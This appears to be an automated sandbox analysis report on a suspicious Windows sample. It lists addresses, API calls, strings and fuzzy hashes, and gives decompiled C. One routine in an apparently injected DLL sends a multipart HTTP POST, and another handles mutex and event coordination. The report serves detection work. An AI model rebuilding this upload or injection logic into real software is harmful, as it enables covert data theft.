                                                                                                                        0x6f33584e
                                                                                                                        0x6f335860
                                                                                                                        0x6f335866
                                                                                                                        0x6f335871
                                                                                                                        0x6f335882
                                                                                                                        0x6f335888
                                                                                                                        0x6f335893
                                                                                                                        0x6f335893
                                                                                                                        0x6f3358a2
                                                                                                                        0x6f3358aa
                                                                                                                        0x6f3359e2
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f335971
                                                                                                                        0x6f335973
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33598f
                                                                                                                        0x6f335995
                                                                                                                        0x00000000
                                                                                                                        0x6f335995
                                                                                                                        0x6f3358bb
                                                                                                                        0x6f3358bf
                                                                                                                        0x6f3358c4
                                                                                                                        0x6f3358c9
                                                                                                                        0x6f3358cd
                                                                                                                        0x6f33594c
                                                                                                                        0x6f335953
                                                                                                                        0x6f33595e
                                                                                                                        0x6f335965
                                                                                                                        0x6f33596a
                                                                                                                        0x6f33596d
                                                                                                                        0x6f33596d
                                                                                                                        0x00000000
                                                                                                                        0x6f33595e
                                                                                                                        0x6f3358d3
                                                                                                                        0x6f3358d6
                                                                                                                        0x6f3358eb
                                                                                                                        0x6f3358ef
                                                                                                                        0x6f3358f2
                                                                                                                        0x6f335907
                                                                                                                        0x6f33590b
                                                                                                                        0x6f33590e
                                                                                                                        0x6f335923
                                                                                                                        0x6f335932
                                                                                                                        0x6f335936
                                                                                                                        0x6f33593b
                                                                                                                        0x6f335942
                                                                                                                        0x6f335944
                                                                                                                        0x6f335944
                                                                                                                        0x00000000
                                                                                                                        0x6f335942
                                                                                                                        0x6f335916
                                                                                                                        0x6f33591b
                                                                                                                        0x6f335921
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335921
                                                                                                                        0x6f3358fa
                                                                                                                        0x6f3358ff
                                                                                                                        0x6f335905
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335905
                                                                                                                        0x6f3358de
                                                                                                                        0x6f3358e3
                                                                                                                        0x6f3358e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3358e9

                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        Strings
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 1438124730-2948876467
                                                                                                                        • Opcode ID: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction ID: 2d51272c1173d9ffcb8a03b69d0064296ed9a9be5b73b236c802b838761fdf0f
                                                                                                                        • Opcode Fuzzy Hash: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction Fuzzy Hash: A291B0B290478AAFD760DF24CC89F6B77ADEF88725F00050CFA4596181DB74F8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E20FD, Relevance: 63.2, APIs: 2, Strings: 33, Instructions: 1921sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E210B
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E2298
                                                                                                                          • Part of subcall function 004A1A2A: __EH_prolog3.LIBCMT ref: 004A1A31
                                                                                                                          • Part of subcall function 004A1A2A: InitializeCriticalSection.KERNEL32(?,00000028,004A24F0,?,00000000,00000000,00000000,?,?,00000002,?,00000000,0000042C), ref: 004A1A46
                                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(00000001,00000004,004A3359,00000008,004BDB63,00747890,00000000,?,?,?,?,?,?,00000001,00747890,00000004), ref: 004A1CA8
                                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(00000001,?,?,?,?,?,?,00000001,00747890,00000004,?,?,?,?,00000000,00000001), ref: 004A1CC9
                                                                                                                          • Part of subcall function 005075E8: __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                          • Part of subcall function 004F2913: __EH_prolog3.LIBCMT ref: 004F291A
                                                                                                                          • Part of subcall function 004BB266: __EH_prolog3.LIBCMT ref: 004BB26D
                                                                                                                          • Part of subcall function 004A2DE3: __EH_prolog3.LIBCMT ref: 004A2DEA
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                          • Part of subcall function 004DE289: __EH_prolog3.LIBCMT ref: 004DE290
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                                          • Part of subcall function 004E1A9C: __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                                          • Part of subcall function 004DEEE8: __EH_prolog3.LIBCMT ref: 004DEEF3
                                                                                                                          • Part of subcall function 004DEFF8: __EH_prolog3.LIBCMT ref: 004DF003
                                                                                                                          • Part of subcall function 0050E7A1: __EH_prolog3.LIBCMT ref: 0050E7A8
                                                                                                                          • Part of subcall function 004A2880: __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                                          • Part of subcall function 004A2880: EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                                          • Part of subcall function 004A2880: LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                                          • Part of subcall function 004A2E2B: __EH_prolog3.LIBCMT ref: 004A2E32
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                          • Part of subcall function 004C1900: __EH_prolog3.LIBCMT ref: 004C1907
                                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                                          • Part of subcall function 004BED5B: __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                                          • Part of subcall function 0050DBBD: __EH_prolog3.LIBCMT ref: 0050DBC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$EnterLeave$LoadString$DeleteH_prolog3_H_prolog3_catchSleep_swprintfchar_traits
                                                                                                                        • String ID: - $ MH=$00-00000-000000-000000$BLOCKED$Client$Commercial$GWLevel$HTTPIN$HTTPOUT$HideOnlineStatus$IsDemoMachine$Keepalive$Language$LastKeepaliveError$LastKeepalivePerformance$LicenseType$Login$MC.L $MC.Login.WrongKey SH=$NoOfActiveKeepalive$Router$Runtime$SupportedFeatures$TCPIN$TCPOUT$TVQS$TVQSC$TeamViewer$UNKNOWN$UsageEnvironment$VPN$VPNMAC$ping3.dyngate.com
                                                                                                                        • API String ID: 2340748101-1895621411
                                                                                                                        • Opcode ID: 284cd20c6048c2be34acce99783f3d5491e2692f1c78a67421794eb950f014a4
                                                                                                                        • Instruction ID: 507374b0a125fca44c731598b8375f7de032354b548efb72292124f8c3c2b4fa
                                                                                                                        • Opcode Fuzzy Hash: 284cd20c6048c2be34acce99783f3d5491e2692f1c78a67421794eb950f014a4
                                                                                                                        • Instruction Fuzzy Hash: D1F21271804288EEDF11EBB5CD56AED7B78AF22308F14819EF40667292DB785F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3378B0, Relevance: 59.7, APIs: 27, Strings: 7, Instructions: 223sleepstringsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F3378B0() {
				void* _t24;
				char* _t25;
				CHAR* _t27;
				void* _t31;
				intOrPtr _t38;
				CHAR* _t42;
				void* _t46;
				char _t47;
				char _t53;
				void* _t54;
				void* _t57;
				int _t58;
				int _t59;
				CHAR* _t62;
				intOrPtr _t64;
				char* _t70;
				CHAR* _t73;
				intOrPtr _t78;
				intOrPtr _t83;
				CHAR* _t84;
				void* _t89;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				intOrPtr _t114;

				_t62 =  *(_t95 + 0x320);
				if(_t62 == 0) {
					L20:
					_t24 = CreateMutexA( *(_t95 + 0x31c),  *(_t95 + 0x320), _t62); // executed
					return _t24;
				} else {
					_t25 = M6F340570; // 0x783f38
					if(StrCmpNIA(_t62, _t25, 0xa) == 0) {
						L4:
						_t27 = M6F34057C; // 0x784250
						if(lstrcmpiA(_t62, _t27) == 0) {
							if(M6F340514 > 0) {
								do {
									Sleep(0x3e8);
									_t58 = M6F340514; // 0x0
									_t59 = _t58 - 1;
									M6F340514 = _t59;
								} while (_t59 > 0);
							}
							if(M6F3404B8 != 0) {
								_t70 = M6F340530; // 0xa32c28
								wsprintfA(_t95 + 0x11c, "\"%s\"", _t70);
								_t53 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
								_push(_t53);
								_push(_t95 + 0x128);
								_t54 = E6F3329D0();
								_t95 = _t95 + 0x14;
								if(_t54 != 0) {
									_t91 = 0;
									while(1) {
										_t83 = M6F340544; // 0x1
										wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x45, _t83);
										_t95 = _t95 + 0x14;
										_t57 = OpenEventA(2, 0, _t95 + 0x10);
										if(_t57 != 0) {
											break;
										}
										Sleep(0x3e8);
										_t91 = _t91 + 1;
										if(_t91 < 0xa) {
											continue;
										}
										goto L12;
									}
									_push(_t57);
									L19:
									CloseHandle();
									ExitProcess(0);
								}
							}
							L12:
							_t94 = 0;
							while(1) {
								_t114 = M6F340544; // 0x1
								wsprintfA(_t95 + 0x10, "%s%c%d", _t62, 0x45, 0 | _t114 == 0x00000000);
								_t95 = _t95 + 0x14;
								_t89 = OpenEventA(2, 0, _t95 + 0x10);
								if(_t89 == 0) {
									break;
								}
								_push(_t89);
								if(M6F340544 == 0) {
									goto L19;
								}
								SetEvent();
								CloseHandle(_t89);
								Sleep(0x3e8);
								_t94 = _t94 + 1;
								if(_t94 < 0x3c) {
									continue;
								}
								break;
							}
							_push(0xc);
							_push(0x6f34046c);
							L6F33C2EE();
							_t78 = M6F340544; // 0x1
							wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x45, _t78);
							_t97 = _t95 + 0x14;
							 *0x6f34046c = CreateEventA( *(_t95 + 0x338), 1, 0, _t97 + 0x10);
							_t38 = M6F34057C; // 0x784250
							wsprintfA(_t97 + 0x1c, "%s%s%c", "Global\\", _t38, 0x4b);
							_t98 = _t97 + 0x14;
							 *0x6f340470 = CreateEventA(0, 1, 0, _t98 + 0x10);
							E6F332170(_t40, 6);
							_t42 = M6F34057C; // 0x784250
							wsprintfA(_t98 + 0x24, "%s%s%c", "Global\\", _t42, 0x52);
							_t99 = _t98 + 0x1c;
							 *0x6f340474 = CreateEventA(0, 1, 0, _t99 + 0x10);
							E6F332170(_t44, 6);
							_t46 = CreateThread(0, 0, E6F335240, 0, 0, 0); // executed
							M6F340510 = _t46;
							_t47 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
							E6F332DF0(_t47, ".bak");
							_t95 = _t99 + 0x10;
						}
						_t64 = M6F340544; // 0x1
						wsprintfA(_t95 + 0x1c, "%s%c%d", _t62, 0x48, _t64);
						_t31 = CreateMutexA( *(_t95 + 0x338),  *(_t95 + 0x33c), _t95 + 0x24); // executed
						return _t31;
					} else {
						_t73 = M6F340574; // 0x784294
						if(lstrcmpiA(_t62, _t73) == 0) {
							goto L4;
						} else {
							_t84 = M6F340578; // 0x798f80
							if(lstrcmpiA(_t62, _t84) != 0) {
								goto L20;
							} else {
								goto L4;
							}
						}
					}
				}
			}































                                                                                                                        0x6f3378b7
                                                                                                                        0x6f3378c1
                                                                                                                        0x6f337b4e
                                                                                                                        0x6f337b5f
                                                                                                                        0x6f337b6d
                                                                                                                        0x6f3378c7
                                                                                                                        0x6f3378c7
                                                                                                                        0x6f3378de
                                                                                                                        0x6f337900
                                                                                                                        0x6f337900
                                                                                                                        0x6f337913
                                                                                                                        0x6f337920
                                                                                                                        0x6f337922
                                                                                                                        0x6f337927
                                                                                                                        0x6f33792d
                                                                                                                        0x6f337932
                                                                                                                        0x6f337933
                                                                                                                        0x6f337938
                                                                                                                        0x6f337922
                                                                                                                        0x6f337943
                                                                                                                        0x6f337945
                                                                                                                        0x6f337959
                                                                                                                        0x6f33795b
                                                                                                                        0x6f337960
                                                                                                                        0x6f337968
                                                                                                                        0x6f337969
                                                                                                                        0x6f33796e
                                                                                                                        0x6f337973
                                                                                                                        0x6f337975
                                                                                                                        0x6f337977
                                                                                                                        0x6f337977
                                                                                                                        0x6f33798b
                                                                                                                        0x6f33798d
                                                                                                                        0x6f337999
                                                                                                                        0x6f3379a1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379ac
                                                                                                                        0x6f3379b2
                                                                                                                        0x6f3379b6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379b6
                                                                                                                        0x6f337b3f
                                                                                                                        0x6f337b40
                                                                                                                        0x6f337b40
                                                                                                                        0x6f337b48
                                                                                                                        0x6f337b48
                                                                                                                        0x6f337973
                                                                                                                        0x6f3379b8
                                                                                                                        0x6f3379b8
                                                                                                                        0x6f3379c0
                                                                                                                        0x6f3379c2
                                                                                                                        0x6f3379d9
                                                                                                                        0x6f3379db
                                                                                                                        0x6f3379ed
                                                                                                                        0x6f3379f1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379fa
                                                                                                                        0x6f3379fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337a01
                                                                                                                        0x6f337a08
                                                                                                                        0x6f337a13
                                                                                                                        0x6f337a19
                                                                                                                        0x6f337a1d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337a1d
                                                                                                                        0x6f337a1f
                                                                                                                        0x6f337a21
                                                                                                                        0x6f337a26
                                                                                                                        0x6f337a2b
                                                                                                                        0x6f337a3f
                                                                                                                        0x6f337a4e
                                                                                                                        0x6f337a5f
                                                                                                                        0x6f337a64
                                                                                                                        0x6f337a79
                                                                                                                        0x6f337a7b
                                                                                                                        0x6f337a8e
                                                                                                                        0x6f337a93
                                                                                                                        0x6f337a98
                                                                                                                        0x6f337aaf
                                                                                                                        0x6f337ab1
                                                                                                                        0x6f337ac4
                                                                                                                        0x6f337ac9
                                                                                                                        0x6f337ae0
                                                                                                                        0x6f337ae6
                                                                                                                        0x6f337aeb
                                                                                                                        0x6f337af6
                                                                                                                        0x6f337afb
                                                                                                                        0x6f337afb
                                                                                                                        0x6f337afe
                                                                                                                        0x6f337b12
                                                                                                                        0x6f337b2c
                                                                                                                        0x6f337b3c
                                                                                                                        0x6f3378e0
                                                                                                                        0x6f3378e0
                                                                                                                        0x6f3378ec
                                                                                                                        0x00000000
                                                                                                                        0x6f3378ee
                                                                                                                        0x6f3378ee
                                                                                                                        0x6f3378fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3378fa
                                                                                                                        0x6f3378ec
                                                                                                                        0x6f3378de

                                                                                                                        APIs
                                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 6F3378D0
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 6F3378E8
                                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 6F3378F6
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 6F337909
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337927
                                                                                                                        • wsprintfA.USER32 ref: 6F337959
                                                                                                                        • wsprintfA.USER32 ref: 6F33798B
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F337999
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F3379AC
                                                                                                                        • wsprintfA.USER32 ref: 6F3379D9
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3379E7
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F337A01
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337A08
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337A13
                                                                                                                        • RtlZeroMemory.NTDLL(6F34046C,0000000C), ref: 6F337A26
                                                                                                                        • wsprintfA.USER32 ref: 6F337A3F
                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6F337A5B
                                                                                                                        • wsprintfA.USER32 ref: 6F337A79
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337A89
                                                                                                                        • wsprintfA.USER32 ref: 6F337AAF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337ABF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337AE0
                                                                                                                        • wsprintfA.USER32 ref: 6F337B12
                                                                                                                        • CreateMutexA.KERNEL32(?,?,?), ref: 6F337B2C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337B40
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337B48
                                                                                                                        • CreateMutexA.KERNEL32(?,?,?), ref: 6F337B5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CreateEvent$Sleeplstrcmpi$CloseHandleMutexOpen$ExitMemoryProcessThreadZero
                                                                                                                        • String ID: "%s"$%s%c%d$%s%s%c$.bak$8?x$Global\$PBx
                                                                                                                        • API String ID: 3072521908-1469005943
                                                                                                                        • Opcode ID: 77a9d7cee298c61c5677a070d885f03169e294ee224fca01211cbc811dab90a3
                                                                                                                        • Instruction ID: a6b6b7b4af4bb5f110e3aea0af5fc70feeb22d42f8c1c554d19a052ca8d20c7c
                                                                                                                        • Opcode Fuzzy Hash: 77a9d7cee298c61c5677a070d885f03169e294ee224fca01211cbc811dab90a3
                                                                                                                        • Instruction Fuzzy Hash: 0471F3B3E08B99AFE720EB64CC85FAB37ADEB99710F00050DF61596180DB71E5188B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

